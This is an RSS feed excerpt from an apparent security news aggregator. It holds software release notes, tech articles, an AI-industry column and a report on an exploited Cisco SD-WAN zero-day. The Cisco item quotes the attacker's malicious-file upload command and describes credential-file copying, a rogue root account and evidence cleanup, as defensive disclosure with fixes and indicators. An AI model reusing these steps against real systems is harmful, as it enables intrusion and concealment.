<li>Update task history handling for the SDK migration, including legacy task history visibility, metadata preservation on resume, and corrected deletion behavior.</li>
<li>Route compacting and mistake-limit behavior through the SDK so the Compact button and mistake tracking affect the active SDK session.</li>
<li>Remove the legacy Explain Changes feature as part of the SDK migration cleanup.</li>
<li>Temporarily disable subagents in the VS Code extension while the SDK-backed experience is stabilized.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fix marketplace edge cases, including refreshing MCP servers after marketplace installs, disabling the MCP Marketplace tab from remote config, hiding workflows from Customize, surfacing plugin-bundled skills, and uninstalling shared marketplace entries.</li>
<li>Fix chat submission during active turns by queuing user messages instead of dropping or racing them, showing pending/queued states promptly, rendering direct user messages immediately, and removing delayed send behavior.</li>
<li>Fix editing previous user messages so Escape cancels editing locally and reset action labels are clearer.</li>
<li>Fix terminal reliability, including standalone Windows output capture, hardened PowerShell command handling, running-state display for in-progress commands, raw structured command preservation, single-quote handling, cwd setup timeouts, failing-command stdout capture, heredoc coalescing, and removal of duplicated command echoes in tool results.</li>
<li>Fix SDK tool-result and provider-message budgeting by truncating large tool outputs by default, capping assistant text, limiting bash/file-read/search output ingestion, bounding media budgets, batching outdated-read rewrites to preserve provider prefix caches, and normalizing JSON-like tool inputs by schema.</li>
<li>Fix login and feature-flag resolution by using the correct user/account identity on startup and simplifying the login UX.</li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/cline/cline/compare/v3.89.2...v4.0.0"><tt>v3.89.2...v4.0.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for ChromeOS / ChromeOS Flex]]></title>
<description><![CDATA[The ChromeOS Stable channel is being updated to OS version 16667.55.0 (Browser version 149.0.7827.226) for most ChromeOS devices.If you find new issues, please let us know one of the following ways:File a bugVisit our ChromeOS communitiesGeneral: Chromebook Help CommunityBeta Specific: ChromeOS B...]]></description>
<link>https://tsecurity.de/de/3628427/it-security-nachrichten/stable-channel-update-for-chromeos-chromeos-flex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628427/it-security-nachrichten/stable-channel-update-for-chromeos-chromeos-flex/</guid>
<pubDate>Fri, 26 Jun 2026 21:23:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span color="rgba(0, 0, 0, 0.87)">The ChromeOS Stable channel is being updated to OS version </span><span color="rgba(0, 0, 0, 0.87)">16667.55.0</span><span color="rgba(0, 0, 0, 0.87)"> (Browser version </span><span color="rgba(0, 0, 0, 0.87)">149.0.7827.226</span><span color="rgba(0, 0, 0, 0.87)">) for most ChromeOS devices.</span></p><div><span><span>If you find new issues, please let us know one of the following ways:</span></span></div><ol><li><span><span><a href="https://bugs.chromium.org/p/chromium/issues/list"><span>File a bug</span></a></span></span></li><li aria-level="1"><p role="presentation"><span><span>Visit our ChromeOS communities</span></span></p></li><ol><li aria-level="2"><p role="presentation"><span><span>General: </span><a href="https://support.google.com/chromebook/community/?hl=en&amp;gpf=%23!forum%2Fchromebook-central"><span>Chromebook Help Community</span></a></span></p></li><li aria-level="2"><p role="presentation"><span><span>Beta Specific: </span><a href="https://support.google.com/chromeos-beta/community"><span>ChromeOS Beta Help Community</span></a></span></p></li></ol><li aria-level="1"><p role="presentation"><a href="https://support.google.com/chrome/answer/95315?hl=en&amp;co=GENIE.Platform%3DDesktop"><span><span><span>Report an issue or send feedback on Chrome</span></span></span></a></p></li><li aria-level="1"><p role="presentation"><span><span>Interested in switching channels? </span><a href="https://support.google.com/chromebook/answer/1086915"><span>Find out how.</span></a></span></p></li></ol><p><span><span><span>Luis Menezes</span></span></span></p><p><span>Google ChromeOS</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Use ChatGPT Inside the New Siri App on iOS 27]]></title>
<description><![CDATA[iOS 27 adds a new Siri app with a chatbot-style design, and while it opens with Apple’s new Siri AI by default, users can switch to ChatGPT whenever they need a different response style or broader assistant support.



The Siri app includes a text box, support for image and file attachments, and ...]]></description>
<link>https://tsecurity.de/de/3628416/ios-mac-os/how-to-use-chatgpt-inside-the-new-siri-app-on-ios-27/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628416/ios-mac-os/how-to-use-chatgpt-inside-the-new-siri-app-on-ios-27/</guid>
<pubDate>Fri, 26 Jun 2026 21:10:42 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[iOS 27 adds a new Siri app with a chatbot-style design, and while it opens with Apple’s new Siri AI by default, users can switch to ChatGPT whenever they need a different response style or broader assistant support.



The Siri app includes a text box, support for image and file attachments, and a menu for older conversations, which makes it feel closer to a full AI chat app rather than the old voice-first Siri experience.



How to Switch From Siri AI to ChatGPT



To use ChatGPT inside the Siri app, long-press the input field and tap Ask… from the menu that appears. The app then shows a pop-up where you can choose between Siri and ChatGPT.



Right now, only Siri and ChatGPT appear as options, although Apple may add more chatbot providers later.



There are some limits users should know before switching. ChatGPT cannot read the messages you already sent to Siri, and Siri cannot access the part of the chat handled by ChatGPT.



The app also switches back to Siri after closing and reopening, even if ChatGPT was selected earlier. For now, iOS 27 does not offer a permanent ChatGPT default setting inside the Siri app.]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Desktop Update]]></title>
<description><![CDATA[The Dev channel has been updated to 151.0.7912.0 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place to...]]></description>
<link>https://tsecurity.de/de/3627894/it-security-nachrichten/chrome-dev-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627894/it-security-nachrichten/chrome-dev-for-desktop-update/</guid>
<pubDate>Fri, 26 Jun 2026 17:54:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Dev channel has been updated to 151.0.7912.0 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7896.2..151.0.7912.0?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Mac Users Are Getting More Out of AI Creative Work]]></title>
<description><![CDATA[For a long time, the Mac's reputation as a creative machine rested on its hardware and native apps — Final Cut, Logic, the tight integration between a Retina display and color-accurate tools. AI has started to quietly rewrite that equation.



The shift isn't dramatic. Most Mac users haven't aban...]]></description>
<link>https://tsecurity.de/de/3627699/ios-mac-os/how-mac-users-are-getting-more-out-of-ai-creative-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627699/ios-mac-os/how-mac-users-are-getting-more-out-of-ai-creative-work/</guid>
<pubDate>Fri, 26 Jun 2026 16:22:31 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For a long time, the Mac's reputation as a creative machine rested on its hardware and native apps — Final Cut, Logic, the tight integration between a Retina display and color-accurate tools. AI has started to quietly rewrite that equation.



The shift isn't dramatic. Most Mac users haven't abandoned their existing workflows. But something is changing in how people approach the early, messier stages of creative work — ideation, iteration, rapid visual exploration — and AI tools are filling a gap that native apps never really addressed.



The Friction Nobody Talks About



The real challenge with AI-assisted creative work isn't capability. The models are impressive. The friction is operational: too many platforms, too many tabs, too much manual handoff between steps.



A typical session might involve generating an image in one tool, downloading it, uploading it somewhere else for background removal, switching to another service for video conversion, and then losing track of which version came from which prompt. This kind of tool-hopping breaks the focused state that creative work depends on.



Mac users feel this acutely, because the platform has always rewarded deep, single-environment focus. The friction isn't a technical problem — it's a workflow problem.



What's Actually Changing







The most useful AI tools emerging right now aren't necessarily the ones with the most powerful models. They're the ones that minimize context-switching.



This is showing up in a few different ways:



Unified canvas environments. Some tools are moving toward a visual, node-based interface — where discrete AI tasks (image generation, background swap, video conversion) connect to each other on an infinite canvas, with outputs flowing directly from one step to the next. For Mac users who think spatially and work across large or multiple displays, this approach fits naturally. 



Multi-model access in one place. Rather than holding separate subscriptions to GPT Image 2, Seedance, Kling, Midjourney, or other services, users increasingly want a single interface where different models can be called on for different tasks within the same session. Banana Pro AI is one platform taking this direction — the model becomes a tool choice, not a platform commitment.



Reusable workflow templates. Once a pipeline is built — say, a product photo → model integration → short video sequence — it can be saved and rerun with new inputs. Tools like Workflow Studio make this possible without rebuilding from scratch each time. The setup cost is paid once, which matters most to anyone managing a content catalog or running regular production cycles.



The Mac Advantage in This Context



None of this is Mac-exclusive. But there are reasons Mac users tend to adopt these kinds of tools quickly.



The platform's culture has always favored deep tool mastery over constant app-switching. When a creative environment reduces friction and rewards learning its structure, Mac users lean in. The spatial thinking that makes tools like Figma, Miro, or even Xcode feel natural translates well to canvas-based AI workflows.



The device ecosystem matters too. Heavy work happens at a desk — MacBook Pro, external display, the full setup. But review, approval, and light adjustment increasingly happen on an iPhone. Tools that sync across both contexts fit into how Mac users already move through their day.



The Shift in Creative Roles



What AI actually changes isn't the final output — it's who can generate a first draft, and how quickly.



A solo designer can now run product photography variations, motion concepts, and visual alternates in a single session that would have previously required a photographer, a video editor, and several rounds of back-and-forth. The creative direction still comes from the person. The labor-intensive middle steps increasingly don't.



This doesn't collapse the value of craft. If anything, it raises the bar for creative judgment — because the bottleneck is no longer production capacity, it's the quality of decisions made at each step. Mac users who treat these tools as leverage for their existing skills, rather than replacements for them, tend to get the most out of them.



A Practical Reality



The honest version of this story isn't that AI has transformed creative work overnight. Most professionals are still figuring out where it fits and where it doesn't.



What has changed is that the experimentation cost has dropped. Trying a visual direction, running a quick motion test, exploring a product presentation format — these used to require either significant time or significant budget. They increasingly don't.



For Mac users with an existing creative practice, that's not a disruption. It's an expansion of what's possible in a single afternoon's work.]]></content:encoded>
</item>
<item>
<title><![CDATA[Water and Wastewater Systems Become Strategic Targets for Russia, China, and Iran]]></title>
<description><![CDATA[Water and wastewater systems have become strategic gray‑zone targets for Russia, China, and Iran, driven by chronic underinvestment and weak operational‑technology (OT) defenses that make these utilities easy to probe and exploit. Internet‑facing human‑machine interfaces (HMIs), exposed programma...]]></description>
<link>https://tsecurity.de/de/3627524/it-security-nachrichten/water-and-wastewater-systems-become-strategic-targets-for-russia-china-and-iran/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627524/it-security-nachrichten/water-and-wastewater-systems-become-strategic-targets-for-russia-china-and-iran/</guid>
<pubDate>Fri, 26 Jun 2026 15:22:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Water and wastewater systems have become strategic gray‑zone targets for Russia, China, and Iran, driven by chronic underinvestment and weak operational‑technology (OT) defenses that make these utilities easy to probe and exploit. Internet‑facing human‑machine interfaces (HMIs), exposed programmable logic controllers (PLCs), default credentials, and poor IT/OT segmentation create low‑cost access paths whose impact is disproportionately […]</p>
<p>The post <a href="https://gbhackers.com/water-and-wastewater-systems/">Water and Wastewater Systems Become Strategic Targets for Russia, China, and Iran</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Water and Wastewater Systems Become Strategic Targets for Russia, China, and Iran]]></title>
<description><![CDATA[Water and wastewater systems have become strategic gray‑zone targets for Russia, China, and Iran, driven by chronic underinvestment and weak operational‑technology (OT) defenses that make these utilities easy to probe and exploit. Internet‑facing human‑machine interfaces (HMIs), exposed programma...]]></description>
<link>https://tsecurity.de/de/3627482/it-security-nachrichten/water-and-wastewater-systems-become-strategic-targets-for-russia-china-and-iran/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627482/it-security-nachrichten/water-and-wastewater-systems-become-strategic-targets-for-russia-china-and-iran/</guid>
<pubDate>Fri, 26 Jun 2026 15:07:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Water and wastewater systems have become strategic gray‑zone targets for Russia, China, and Iran, driven by chronic underinvestment and weak operational‑technology (OT) defenses that make these utilities easy to probe and exploit. Internet‑facing human‑machine interfaces (HMIs), exposed programmable logic controllers…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/water-and-wastewater-systems-become-strategic-targets-for-russia-china-and-iran/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/water-and-wastewater-systems-become-strategic-targets-for-russia-china-and-iran/">Water and Wastewater Systems Become Strategic Targets for Russia, China, and Iran</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why SpaceX is the McDonald’s of AI]]></title>
<description><![CDATA[Have you seen “The Founder”?



It’s the story of McDonald’s and how Ray Kroc (played by Michael Keaton) transformed the company from a local burger joint to a global landlord. According to the movie, Kroc’s accountant gave him the revelation: “You’re not in the burger business. You’re in the rea...]]></description>
<link>https://tsecurity.de/de/3626976/it-nachrichten/why-spacex-is-the-mcdonalds-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626976/it-nachrichten/why-spacex-is-the-mcdonalds-of-ai/</guid>
<pubDate>Fri, 26 Jun 2026 12:02:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Have you seen “<a href="https://en.wikipedia.org/wiki/The_Founder" data-type="link" data-id="https://en.wikipedia.org/wiki/The_Founder" target="_blank" rel="noreferrer noopener">The Founder</a>”?</p>



<p>It’s the story of McDonald’s and how Ray Kroc (played by Michael Keaton) transformed the company from a local burger joint to a global landlord. According to the movie, Kroc’s accountant gave him the revelation: “You’re not in the burger business. You’re in the real estate business.”</p>



<p>When brothers Richard and Maurice McDonald transformed their San Bernardino, CA barbecue restaurant into a fast-food burger joint in 1948, their model was to make and sell their own burgers. They would succeed or fail based on making better food products than other restaurants. </p>



<p>By the time Kroc bought out the McDonald brothers in 1961, the new model was leasing real estate to other people, and those other people would make the food. Whether the original San Bernardino McDonald’s succeeded or failed became irrelevant to the success of the McDonald’s corporation. </p>



<p>SpaceX has done the same thing. Its San Bernardino location, i.e. xAI, can now succeed or fail without affecting the success of the parent company, which is SpaceX. </p>



<p>The company this week <a href="https://www.reuters.com/business/media-telecom/ai-startup-reflection-signs-computing-power-deal-with-spacex-2026-06-22/" data-type="link" data-id="https://www.reuters.com/business/media-telecom/ai-startup-reflection-signs-computing-power-deal-with-spacex-2026-06-22/" target="_blank" rel="noreferrer noopener">signed a compute lease with Reflection AI</a>, a pre-revenue startup founded by former Google DeepMind researchers. Under the agreement, Reflection pays $150 million per month for use of the Nvidia GB300 chips housed at Colossus 2, SpaceX’s expansion facility in Memphis, TN. If the lease runs for the full term, SpaceX as a landlord stands to make around $6.3 billion. (Reflection AI has shipped open-weight models, but has no widely adopted frontier model yet, and was reportedly raising capital at a $25 billion valuation.) </p>



<p>Earlier this month, an S-1 filing revealed that Google agreed to pay SpaceX approximately $920 million per month for 32 months. SpaceX stands to make around $30 billion. And last month, SpaceX disclosed that xAI made a big deal with Anthropic that could bring in to SpaceX as much as $45 billion in revenue.</p>



<p>Regardless of whether <a href="http://x.com/">xAI</a> — or, for that matter, Reflection, Google, or Anthropic — succeeds or fails, SpaceX still wins. </p>



<p>Like McDonald’s (which developed its super efficient burger-building system in order to succeed with its San Bernardino location and ended up using that system to succeed as a landlord), SpaceX is using the Colossus infrastructure it built for <a href="http://x.com/">xAI’s</a> Grok to succeed as an AI landlord.</p>



<p>Grok might succeed, or it might fail. But SpaceX makes bank if Grok’s competitors pay their rent. </p>



<p>That makes Elon Musk, who is the CEO of SpaceX, the Ray Kroc of AI. </p>



<h2 class="wp-block-heading">Nvidia is Mayor McCheese</h2>



<p>Colossus originally went online in July 2024, powered by 100,000 Nvidia H100 Hopper GPUs housed in a Supermicro liquid-cooled HGX H100 chassis. The company doubled that to 200,000 GPUs within a short time and it now comprises more than 220,000 Nvidia GPUs including H100, H200, and next-generation Blackwell-class accelerators. The entire fabric runs on Nvidia’s Spectrum-X Ethernet platform, specifically the Spectrum SN5600 switch built on the Spectrum-4 ASIC. </p>



<p>Also: Nvidia is also heavily invested in companies that are renting compute power on Colossus. The company invests in Anthropic and Reflection AI — and, for that matter, xAI itself and, therefore, SpaceX. </p>



<p>Nvidia has positioned itself as the Mayor McCheese of the AI industry, collecting taxes at every node of the AI economy. It supplies the GPUs and networking fabric that every frontier lab must train on and collects hardware revenue from the winner’s rivals, even as it profits from the winner’s success. </p>



<p>So whether Anthropic, Google, Reflection AI, xAI, or some yet-unformed lab produces the dominant model, the computing power was bought from Nvidia and the landlord’s machine was built from Nvidia silicon. </p>



<h2 class="wp-block-heading">And Apple is the Hamburglar</h2>



<p>Apple’s AI strategy is even more brilliant than Nvidia’s. </p>



<p>It’s built on a three-tier routing system. When you ask Siri to do something, a built-in orchestrator in the operating system decides how complex the task is. According to third-party estimates, around 85% of requests are handled on your Apple device by Apple’s own small, efficient models. (It does things like summarizing text, prioritizing notifications, cleaning up photos, or suggesting replies.) Roughly 12% of all queries get sent to <a href="https://www.computerworld.com/article/2142244/wwdc-apples-private-cloud-compute-is-what-all-cloud-services-should-be.html" data-type="link" data-id="https://www.computerworld.com/article/2142244/wwdc-apples-private-cloud-compute-is-what-all-cloud-services-should-be.html">Private Cloud Compute</a>, Apple’s own server infrastructure running Apple’s larger models on Apple silicon in Apple-owned data centers. Only the hardest 3% of queries get routed to an external partner model.</p>



<p>This design lets Apple avoid the ruinous cost of training a frontier model from scratch. Microsoft, Google, Meta, and Amazon each spend tens of billions of dollars per year on GPU clusters, energy, and research teams to build and run trillion-parameter models. Apple doesn’t. Its own models are deliberately small and run on chips Apple already sells you, so the inference cost is basically absorbed into the device. It only needs a frontier model for that tiny sliver of hard queries, which is where the partnership strategy kicks in.</p>



<p>While frontier labs are collectively spending trillions to build AI infrastructure, Apple is paying Google a mere $1 billion per year to license a custom Gemini model that powers the rebuilt Siri and Apple Intelligence’s complex-query path.</p>



<p>The reason Apple can swap partners is the Foundation Models framework, a native Swift API with a published LanguageModel protocol that any provider can implement. Google’s Gemini conforms to it. Anthropic’s Claude probably conforms to it. Any future model can theoretically conform to it. Apple’s orchestrator routes to whatever model fits the interface, so switching providers means changing routing logic, not rebuilding the whole system. </p>



<p>Apple profits through several channels. Apple Intelligence requires recent hardware, driving upgrade cycles. Advanced features push users toward higher iCloud storage tiers. </p>



<p>And so while everyone else is investing trillions, creating what is essentially debt that has to be repaid somehow, Apple is mainly just collecting billions without the massive investments needed by the frontier model companies. </p>



<p>The AI industry has been telling itself a story: that the companies building the best models will win, that intelligence is the product, that the chatbot with the most capabilities and the cleverest training run will capture the market. That story is wrong. Some of the companies building the best models are tenants. The companies that rent out the compute are landlords. </p>



<p>Ray Kroc would recognize SpaceX’s strategy immediately. The burger doesn’t matter; the land does. Right now, the most valuable land in the world isn’t in Silicon Valley. It’s a data center complex in Memphis full of hundreds of thousands of GPUs. </p>



<p>The man who owns it just realized that he’s not in the AI business at all. He’s in the real estate business. (And he’s probably lovin’ it.)</p>



<p><a href="https://www.computerworld.com/article/4120839/always-disclose-how-you-use-ai.html"><em>AI disclosures</em></a><em>: I don’t use AI for writing. The words you see here are mine. I used a few AI tools via Kagi Assistant (disclosure: my son works at Kagi) as well as both Kagi Search and Google Search as one part of my fact-checking for this column. I used a word processing product called Lex, which has AI tools, and after writing the column, I used Lex’s grammar checking tools to hunt for typos and errors and suggest word changes. Why I disclose my AI use and encourage you to do the same. </em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20245 Zero-Day Exploited in Cisco Catalyst SD-WAN Manager to Gain Root Access]]></title>
<description><![CDATA[A newly disclosed zero-day vulnerability, CVE-2026-20245, has been exploited by a threat actor targeting Cisco Catalyst SD-WAN Manager. By exploiting a flaw in the platform's file to upload functionality, the threat actor escalated privileges from a compromised administrative account to root acce...]]></description>
<link>https://tsecurity.de/de/3626654/it-security-nachrichten/cve-2026-20245-zero-day-exploited-in-cisco-catalyst-sd-wan-manager-to-gain-root-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626654/it-security-nachrichten/cve-2026-20245-zero-day-exploited-in-cisco-catalyst-sd-wan-manager-to-gain-root-access/</guid>
<pubDate>Fri, 26 Jun 2026 09:53:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1126" height="614" src="https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="CVE-2026-20245" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2.webp 1126w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-1024x558.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-750x409.webp 750w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2.webp 1126w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-1024x558.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-750x409.webp 750w" sizes="(max-width: 1126px) 100vw, 1126px" title="CVE-2026-20245 Zero-Day Exploited in Cisco Catalyst SD-WAN Manager to Gain Root Access 1"></p><span data-contrast="auto">A newly disclosed zero-day vulnerability, CVE-2026-20245, has been exploited by a threat actor targeting Cisco Catalyst SD-WAN Manager. By exploiting a flaw in the platform's file to upload functionality, the threat actor escalated privileges from a compromised administrative account to root access and used extensive anti-forensic measures to erase evidence of the attack.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Threat Actor Abused Cisco Catalyst SD-WAN Manager to Gain Root Access</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Mandiant found that the threat actor initially established unauthorized peering connections before accessing Cisco Catalyst SD-WAN Manager over SSH. In March 2026, the attacker authenticated using the default vmanage-admin account, changed the default admin account password, logged into the web interface, and exfiltrated SD-WAN fabric configurations, including device, controller, and template information. </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The original password was then restored to reduce the likelihood of detection. The researchers noted that neither the vmanage-admin nor admin accounts provide root shell access, prompting the attacker to <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="28830">exploit</a> CVE-2026-20245 for privilege escalation.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">CVE-2026-20245 was Exploited Through a Malicious CSV Upload</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The <a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager/?hl=en" target="_blank" rel="nofollow noopener">vulnerability exists</a> because Cisco Catalyst SD-WAN Manager fails to properly filter malicious data uploaded through its tenant file upload feature. The <a class="wpil_keyword_link" href="https://cyble.com/threat-actor/" target="_blank" rel="noopener" title="threat actor" data-wpil-keyword-link="linked" data-wpil-monitor-id="28831">threat actor</a> exploited CVE-2026-20245 by uploading a crafted file named evil_tenant.csv using the com</span><span data-contrast="auto">mand:</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<blockquote><span data-contrast="auto">request tenant-upload tenant-list /home/admin/evil_tenant.csv <a class="wpil_keyword_link" href="https://thecyberexpress.com/how-to-get-a-vpn/" title="vpn" data-wpil-keyword-link="linked" data-wpil-monitor-id="28833">vpn</a> 0</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span></blockquote>
<span data-contrast="auto">Reported to Cisco by Mandiant, CVE-2026-20245 affects the command-line interface of Cisco Catalyst SD-WAN Controllers and allows an authenticated local attacker to execute arbitrary commands as root through a specially crafted file.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The malicious <a href="https://thecyberexpress.com/malicious-actors-macropack-red-team-payloads/" target="_blank" rel="noopener">payload</a> backed up configuration files, preserved copies of /etc/passwd and /etc/shadow, and created a new root-level account named troot. Mandiant later observed the threat actor switching from the admin account to troot using the </span><span data-contrast="auto">su</span><span data-contrast="auto"> command.</span>
<h3 aria-level="2"><b><span data-contrast="none">Rogue Peering Activity Preceded Exploitation</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Mandiant observed multiple unauthorized peering connections between late 2025 and January 2026. Researchers believe these may have exploited CVE-2026-20127 or CVE-2026-20182, two critical Cisco <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28832">vulnerabilities</a> affecting peering authentication that allow remote attackers to bypass authentication and gain administrative privileges.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Further rogue peering activity in March 2026 targeted software versions not vulnerable to CVE-2026-20127. Cisco confirmed the activity also did not rely on CVE-2026-20182, suggesting the <a href="https://thecyberexpress.com/malicious-actors-macropack-red-team-payloads/" target="_blank" rel="noopener">threat actor</a> may have reused stolen certificate material from an earlier compromise. Mandiant said it remains unclear whether the same group conducted both campaigns.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">To conceal the intrusion, the threat actor deleted evil_tenant.csv, restored modified configuration files, removed temporary artifacts, and executed a validation script to confirm that malicious files, the troot account, and altered configuration files had been removed or restored.</span>
<h3 aria-level="2"><b><span data-contrast="none">Implications and Mitigation</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Mandiant said the campaign reflects the growing "living off the edge" trend, where attackers target network appliances that often lack detailed forensic visibility while providing centralized control over enterprise environments. Such platforms remain attractive to <a href="https://thecyberexpress.com/ios-exploit-kit-dubbed-darksword/" target="_blank" rel="noopener">state-sponsored actors</a> seeking long-term intelligence collection.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Organizations are advised to collect diagnostic logs using the </span><span data-contrast="auto">request admin-tech</span><span data-contrast="auto"> command, investigate any indicators of compromise, and report confirmed incidents to Cisco TAC. Cisco recommends upgrading Cisco Catalyst SD-WAN Manager to versions 20.9.9.2, 20.12.7.2, 20.15.4.5, 20.15.5.3, 20.18.3.1, 26.1.1.2, or later to remediate CVE-2026-20245 and following its SD-WAN hardening guidance.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Recovered indicators include the malicious evil_tenant.csv file with SHA-256 hash b82936f37648518425c7d3cf9e09eaffa41d7cdb3840f6a40287e3a108880f7b and rogue IP addresses including 126.51.108[.]152, 76.92.245[.]217, 207.190.37[.]94, 23.245.7[.]178, 153.186.231[.]233, 167.179.79[.]189, 45.32.38[.]160, and 209.137.225[.]101. </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Google SecOps also released detections covering behaviors associated with the threat actor, while Mandiant acknowledged Cisco PSIRT for its collaboration during the coordinated disclosure process.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
